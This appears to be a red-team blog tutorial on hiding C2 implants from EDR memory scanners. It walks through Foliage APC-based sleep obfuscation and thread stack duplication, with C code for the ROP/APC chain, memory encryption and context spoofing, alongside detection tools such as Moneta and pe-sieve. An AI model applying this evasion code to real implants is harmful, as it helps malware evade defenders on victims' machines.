Evading detection in memory - Pt 1: Sleep Obfuscation - Foliage

This post covers evasion of in-memory detection. We will discuss how memory scanners work and how APC-based sleep obfuscation hides an implant while it is idle.

Posted Nov 5, 2024 Updated Jan 11, 2025


Introduction

First, we will talk about the types of memory. They are:

PRIVATE – Not shared with other processes, and its protection can be changed after allocation. Note: it is allocated with APIs such as VirtualAlloc and VirtualAllocEx, which are wrappers around NtAllocateVirtualMemory.
MAPPED – Can be shared with other processes, and its protection is constrained by the access the section was created and mapped with. Note: One way to obtain it is CreateFileMapping + MapViewOfFile.
IMAGE – Memory that is backed by an executable image on disk. For example, the executable that started the process and the DLLs it has loaded.

These categories correspond to the values of the Type member of the MEMORY_BASIC_INFORMATION structure, which the VirtualQuery API fills in for a given address. Malware most commonly uses private memory, because its protection can be changed freely at runtime, whereas mapped memory is limited by how the section was created. Command and Control (C2) implants/agents/beacons use Shellcode Reflective DLL Injection (sRDI) to turn a beacon DLL into shellcode. This technique can be combined with evasive loaders to bypass defense solutions.
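To make the mapping concrete, here is a minimal sketch that translates a Type value into the category names used above. The constants are the documented values from the Windows SDK, redefined locally so the snippet compiles without the SDK; the helper name mem_type_name is an assumption made for this illustration.

```c
#include <stdio.h>

/* Values of MEMORY_BASIC_INFORMATION.Type as documented in the Windows SDK.
 * Redefined here so the sketch builds without <windows.h>. */
#define MEM_PRIVATE 0x00020000u
#define MEM_MAPPED  0x00040000u
#define MEM_IMAGE   0x01000000u

/* Hypothetical helper: translate a Type value into the category name
 * used in this post. */
const char *mem_type_name(unsigned long type)
{
    switch (type) {
    case MEM_PRIVATE: return "PRIVATE";
    case MEM_MAPPED:  return "MAPPED";
    case MEM_IMAGE:   return "IMAGE";
    default:          return "UNKNOWN"; /* e.g. 0 for a free region */
    }
}
```

On Windows, the value would come from the Type member after calling VirtualQuery on an address inside the region of interest.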

The loader does not need to use a complex technique, as it is only a Proof of Concept (PoC). First, the injection takes place, regardless of the evasion technique used. Then, Shellcode Reflective DLL Injection (sRDI) acts on the part highlighted in red: it reflectively loads the PE DLL into another private memory region, which contains only the sections, and executes the entry point.

Detection in memory

A memory scan consumes significant computational resources, so the EDR uses criteria to decide where to scan. One of these criteria is memory that is not backed by a file on disk yet has execute permission, which would flag our beacon. The raw contents are also compared against a database of signatures and rules. Another way to detect our beacon is to analyze the call stack of the thread. The return addresses of post-exploitation commands, and of the beacon's calls while it sleeps, point into the private memory where the beacon resides, indicating that code is being executed from that address.
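From the defender's side, the first criterion can be sketched as a simple filter over region records. This is only an illustration, not how any particular EDR works: region_t is a hypothetical, trimmed-down stand-in for MEMORY_BASIC_INFORMATION, and the function names are assumptions. The constants are the documented Windows SDK values, redefined locally.

```c
#include <stdbool.h>
#include <stddef.h>

/* Documented Windows SDK values, redefined so the sketch builds anywhere. */
#define MEM_PRIVATE            0x00020000u
#define PAGE_EXECUTE           0x10u
#define PAGE_EXECUTE_READ      0x20u
#define PAGE_EXECUTE_READWRITE 0x40u
#define PAGE_EXECUTE_WRITECOPY 0x80u

/* Hypothetical, trimmed-down stand-in for MEMORY_BASIC_INFORMATION. */
typedef struct {
    unsigned long long base;    /* start address of the region */
    unsigned long long size;    /* region size in bytes */
    unsigned long      type;    /* MEM_PRIVATE, MEM_MAPPED or MEM_IMAGE */
    unsigned long      protect; /* PAGE_* protection value */
} region_t;

/* True if the protection value includes any execute right. */
static bool is_executable(unsigned long protect)
{
    const unsigned long exec_mask = PAGE_EXECUTE | PAGE_EXECUTE_READ |
                                    PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY;
    return (protect & exec_mask) != 0;
}

/* A region is worth scanning if it is private (unbacked) and executable. */
bool is_scan_candidate(const region_t *r)
{
    return r->type == MEM_PRIVATE && is_executable(r->protect);
}

/* Count how many regions in the array match the criterion. */
size_t count_scan_candidates(const region_t *regions, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        if (is_scan_candidate(&regions[i])) {
            hits++;
        }
    }
    return hits;
}
```

A private region that is RW at scan time does not match this filter, which is exactly the gap that sleep obfuscation relies on and why scanners combine it with other signals.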

In this post, we will cover how to keep the implant obfuscated in memory, hide its execute permission, and conceal the main code. This helps avoid detection by memory scans, because while the implant sleeps its memory region is encrypted and has no execute permission.

Sleep Obfuscation

Sleep Obfuscation is a technique we can use to hide our beacon in memory from potential memory scans. Essentially, we follow the chain below:

Change the memory protection from RX to RW
Encrypt the memory region
Put the process to sleep for a defined period
Decrypt the memory region
Change the memory permission from RW back to RX
Execute a post-exploitation command from the C2, if available
Repeat the obfuscation chain

Now you must be wondering:

“How do we proceed to the next step after changing the memory protection to RW? We no longer have execution permissions.”

At least, I hope you’re asking yourself this question 😁. It would indeed be impossible for the implant to execute its own instructions once its memory is RW, since it no longer has execute permission. This is where ROP (Return-Oriented Programming) chains driven by timers or APCs (Asynchronous Procedure Calls) come in; these are the well-known ways to achieve this.

Key Concepts: ROP Chains, Timers and APCs

Technique	Details
ROP Chains	Return-Oriented Programming is a technique in which small chunks of existing executable code (gadgets) are reused to build a chain of instructions that can perform arbitrary actions. It is useful when our own code cannot be executed directly.
Timers	Timers can be used to schedule each function of the chain to run after a delay. This is useful for controlling when a piece of code executes after the memory state has been modified.
APCs	Asynchronous Procedure Calls let you queue functions to be executed in the context of a specific thread, which runs them when it enters an alertable state. The queued functions live in system DLLs, so they can run while the implant's own memory is not executable.

Foliage

In this article, we will use Foliage, a sleep obfuscation technique based on APCs. Simplified, the flow Foliage uses to perform sleep obfuscation is as follows:

We will create a synchronization event using the NTAPI call NtCreateEvent.

  
Status = Instance()->Win32.NtCreateEvent( &EvtSync, EVENT_ALL_ACCESS, NULL, SynchronizationEvent, FALSE );
if ( Status != 0x00 ) {
    PrintErr( "NtCreateEvent", Status );
}

We will create a suspended thread (the thread where the chain mentioned above will be executed).

  
Status = Instance()->Win32.NtCreateThreadEx( &hSlpThread, THREAD_ALL_ACCESS, NULL, NtCurrentProcess(), NULL, NULL, TRUE, 0, 0x1000 * 20, 0x1000 * 20, NULL );
if ( Status != 0x00 ) {
    PrintErr( "NtCreateThreadEx", Status );
}

We will retrieve the context of the created thread and transfer it to other CONTEXT structures, where the chain will be constructed.

  
CtxMain.ContextFlags = CONTEXT_FULL;
Status = Instance()->Win32.NtGetContextThread( hSlpThread, &CtxMain );
if ( Status != 0x00 ) {
    PrintErr( "NtGetContextThread", Status );
}

We will write the address of NtTestAlert to the location Rsp points to, so that each function in the chain returns to NtTestAlert. This is done because NtTestAlert checks whether there are pending APCs and, if so, executes them.

  
*(PVOID*)CtxMain.Rsp = Instance()->Win32.NtTestAlert;

After populating the other CONTEXT structures with the values returned in CtxMain, we can finally build the chain.

  
/*
 * Wait until EvtSync is signaled
 * NtWaitForSingleObject( EvtSync, FALSE, NULL );
 */
RopSetEvt.Rip = NtWaitForSingleObject;
RopSetEvt.Rcx = EvtSync;
RopSetEvt.Rdx = FALSE;
RopSetEvt.R9  = NULL;

/*
 * Change implant protection to RW
 * VirtualProtect( ImageBase, ImageSize, PAGE_READWRITE, &OldProt ); 
 */
RopProtRw.Rip = VirtualProtect;
RopProtRw.Rcx = ImageBase;
RopProtRw.Rdx = ImageSize;
RopProtRw.R8  = PAGE_READWRITE;
RopProtRw.R9  = &OldProt;

/*
 * memory encryption
 * SystemFunction( &Img, &Key );
 */
RopMemEnc.Rip = SystemFunction040;
RopMemEnc.Rcx = ImageBase;
RopMemEnc.Rdx = ImageSize;

/*
 * delay
 * WaitForSingleObjectEx( NtCurrentProcess(), SleepTime, FALSE );
 */
RopDelay.Rip = Instance()->Win32.WaitForSingleObjectEx;
RopDelay.Rcx = NtCurrentProcess();
RopDelay.Rdx = SleepTime;
RopDelay.R8  = FALSE;

/*
 * memory decryption
 * SystemFunction( &Img, &Key );
 */
RopMemDec.Rip = Instance()->Win32.SystemFunction041;
RopMemDec.Rcx = ImageBase;
RopMemDec.Rdx = ImageSize;

/*
 * change memory to execute and read
 * VirtualProtect( ImageBase, ImageSize, PAGE_EXECUTE_READ, &oldProt );
 */
RopProtRx.Rip = Instance()->Win32.VirtualProtect;
RopProtRx.Rcx = ImageBase;
RopProtRx.Rdx = ImageSize;
RopProtRx.R8  = PAGE_EXECUTE_READ;
RopProtRx.R9  = &OldProt;

/*
 * exit thread
 * RtlExitUserThread( 0x00 );
 */
RopExit.Rip = Instance()->Win32.RtlExitUserThread;
RopExit.Rcx = 0x00;

Now we queue one APC per step. Each APC targets NtContinue and receives the corresponding CONTEXT structure as its parameter, so the thread continues execution with that context.

  
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopSetEvt, FALSE, NULL );
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopProtRw, FALSE, NULL );
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopMemEnc, FALSE, NULL );
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopDelay , FALSE, NULL );
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopMemDec, FALSE, NULL );
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopProtRx, FALSE, NULL );
Instance()->Win32.NtQueueApcThread( hSlpThread, Instance()->Win32.NtContinue, &RopExit  , FALSE, NULL );

Finally, we will resume the thread, trigger the synchronization event, and let it run while the current thread sleeps.

  
Status = Instance()->Win32.NtAlertResumeThread( hSlpThread, NULL );
if ( Status != 0x00 ) {
    PrintErr( "NtAlertResumeThread", Status );
}

Instance()->Win32.printf( "[I] Trigger sleep obf chain\n\n" );

Status = Instance()->Win32.NtSignalAndWaitForSingleObject( EvtSync, hSlpThread, TRUE, NULL );
if ( Status != 0x00 ) {
    PrintErr( "NtSignalAndWaitForSingleObject", Status );
}

Demo

We open our implant in x64dbg and set breakpoints on the functions used in the chain to follow the process step by step. We will also use a tool that provides more information about processes. In this case, I will be using Process Hacker, but Process Explorer from Sysinternals works as well.

The loader we use gives us the base address of the allocation. Below, we navigate to that address.

Deobfuscated region

At this point, we have plaintext strings, and the memory region is separated into RX and RW. Now, we will see the result of the first VirtualProtect.

Executing VirtualProtect RX → RW

Result of Executing VirtualProtect RX → RW

After execution, the memory region was set to RW as expected. The next step is to encrypt it using SystemFunction040.

Executing SystemFunction040 to encrypt the memory area

Next, we can observe the obfuscated memory region. This is how we find it during sleep. Now, we proceed to decrypt it using SystemFunction041.

Executing SystemFunction041

Above, the data is decrypted again, and the memory region returns to 12 KB RX and 4 KB RW.

When analyzing with the memory analysis tool called pe-sieve, we obtain the following results:

Detections and IOCs

As mentioned earlier, one way to analyze a process is to inspect the stack of each thread and look at the calling functions. This can be used to flag our implant: during sleep, the thread's stack still holds return addresses that point back into the memory region now set to RW. This is a problem for us, as it makes detection easier.
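The check a stack-inspecting tool performs can be sketched roughly as follows. This is an illustrative model only, not the logic of any specific tool: mem_range_t, find_range and first_unbacked_frame are hypothetical names, and the return addresses are assumed to have been collected by a stack walk beforehand.

```c
#include <stddef.h>

/* Documented Windows SDK value, redefined so the sketch builds anywhere. */
#define MEM_IMAGE 0x01000000u

/* Hypothetical description of one memory region of the process. */
typedef struct {
    unsigned long long base; /* start address */
    unsigned long long size; /* size in bytes */
    unsigned long      type; /* MEM_PRIVATE, MEM_MAPPED or MEM_IMAGE */
} mem_range_t;

/* Find the region that contains addr, or NULL if none does. */
static const mem_range_t *find_range(const mem_range_t *ranges, size_t n,
                                     unsigned long long addr)
{
    for (size_t i = 0; i < n; i++) {
        if (addr >= ranges[i].base && addr - ranges[i].base < ranges[i].size) {
            return &ranges[i];
        }
    }
    return NULL;
}

/* Return the index of the first frame whose return address does not fall
 * inside image-backed memory, or -1 if every frame is image-backed. */
int first_unbacked_frame(const unsigned long long *ret_addrs, size_t n_frames,
                         const mem_range_t *ranges, size_t n_ranges)
{
    for (size_t i = 0; i < n_frames; i++) {
        const mem_range_t *r = find_range(ranges, n_ranges, ret_addrs[i]);
        if (r == NULL || r->type != MEM_IMAGE) {
            return (int)i;
        }
    }
    return -1;
}
```

A sleeping thread whose stack contains a return address inside a private region would be reported by a check like this, regardless of whether that region is currently RX or RW.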

post-ex activity:

Sleep routine:

Looking at Moneta, we can see the IOC mentioned above.

Another detection method looks at VirtualProtect being called with a return address in NtTestAlert, a pattern that security products monitor for. Elastic EDR, for example, has a rule based on this IOC (Indicator of Compromise).

Stack Duplication

The Moneta IOC is caused by the stack of the main thread, which keeps the NtSignalAndWaitForSingleObject frame for the entire sleep. We solved this with a technique called Stack Duplication, in which we clone the properties of another thread, including its registers and its stack (which holds the return addresses). The steps are:

Look for another thread running in the process and open it, so that its properties can be read and applied with [NtGetContextThread](https://ntdoc.m417z.com/ntgetcontextthread)/NtSetContextThread, and use DuplicateHandle to obtain a handle to the current thread.

  
Status = bkThreadOpen(
	THREAD_ALL_ACCESS, FALSE, DupThreadId, &DupThreadHandle 
);    
Status = Instance()->Win32().DuplicateHandle(
	NtCurrentProcess(), NtCurrentThread(), NtCurrentProcess(), 
	&MainThreadHandle, THREAD_ALL_ACCESS, FALSE, 0 
);

Inside the obfuscation routine, back up the state of the current thread and then apply to it the properties of the thread we decided to impersonate.

  
RopCtxGetBkp.Rip = Instance()->Win32().NtGetContextThread;
RopCtxGetBkp.Rcx = MainThreadHandle;
RopCtxGetBkp.Rdx = &CtxBkp;

RopCtxSetSpf.Rip = Instance()->Win32().NtSetContextThread;
RopCtxSetSpf.Rcx = MainThreadHandle;
RopCtxSetSpf.Rdx = &CtxSpf;

Before the routine completes, we restore the backup.

  
RopCtxSetBkp.Rip = Instance()->Win32().NtSetContextThread;
RopCtxSetBkp.Rcx = MainThreadHandle;
RopCtxSetBkp.Rdx = &CtxBkp;

This way, the stack of the beacon's main thread during obfuscation will look like this:

Escaping detections based on the beacon’s main thread stack.

Conclusion

Plain sleep obfuscation still leaves IOCs behind, but it can be improved to bypass these detection techniques. One such improvement, covered in this post, is Stack Duplication.

Other improvements will be the topic of the next article in this blog: Module Stomping, the use of jump gadgets, and avoiding detection based on ETW-TI, such as Fluctuation Monitor.


This post is licensed under CC BY 4.0 by the author.